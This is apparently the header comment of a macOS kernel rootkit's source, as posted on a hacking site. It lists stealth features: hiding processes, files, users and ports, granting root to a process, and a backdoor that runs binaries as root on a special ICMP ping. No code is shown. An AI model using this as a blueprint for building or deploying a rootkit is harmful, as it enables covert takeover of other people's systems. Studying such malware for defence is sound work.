SOLDIERX.COM Nobody Can Stop Information Insemination

/*
                        .o8        o8o  oooo
                       "888        `"'  `888
  oooo d8b oooo  oooo   888oooo.  oooo   888  oooo    ooo ooo. .oo.
  `888""8P `888  `888   d88' `88b `888   888   `88.  .8'  `888P"Y88b
   888      888   888   888   888  888   888    `88..8'    888   888
   888      888   888   888   888  888   888     `888'     888   888
  d888b     `V88V"V8P'  `Y8bod8P' o888o o888o     .8'     o888o o888o
                                            .o..P' HARDCORE EST. 1983
                                            `Y8P'

  64bit Mac OS-X kernel rootkit that uses no hardcoded address
  to hook the BSD subsystem in all OS-X Lion & below. It uses a
  combination of syscall hooking and DKOM to hide activity on a
  host. String resolution of symbols no longer works on Mountain
  Lion as symtab is destroyed during load, this code is portable
  on all Lion & below but requires re-working for hooking under
  Mountain Lion.

  Features:
  * works across multiple kernel versions (tested 11.0.0+)
  * give root privileges to pid
  * hide files / folders
  * hide a process
  * hide a user from 'who'/'w'
  * hide a network port from netstat
  * sysctl interface for userland control
  * execute a binary with root privileges via magic ICMP ping

  greetingz to #nullsecurity crew, snare, dino, nemo, thegrugq,
  piotr & friendz!

  -- prdelka
*/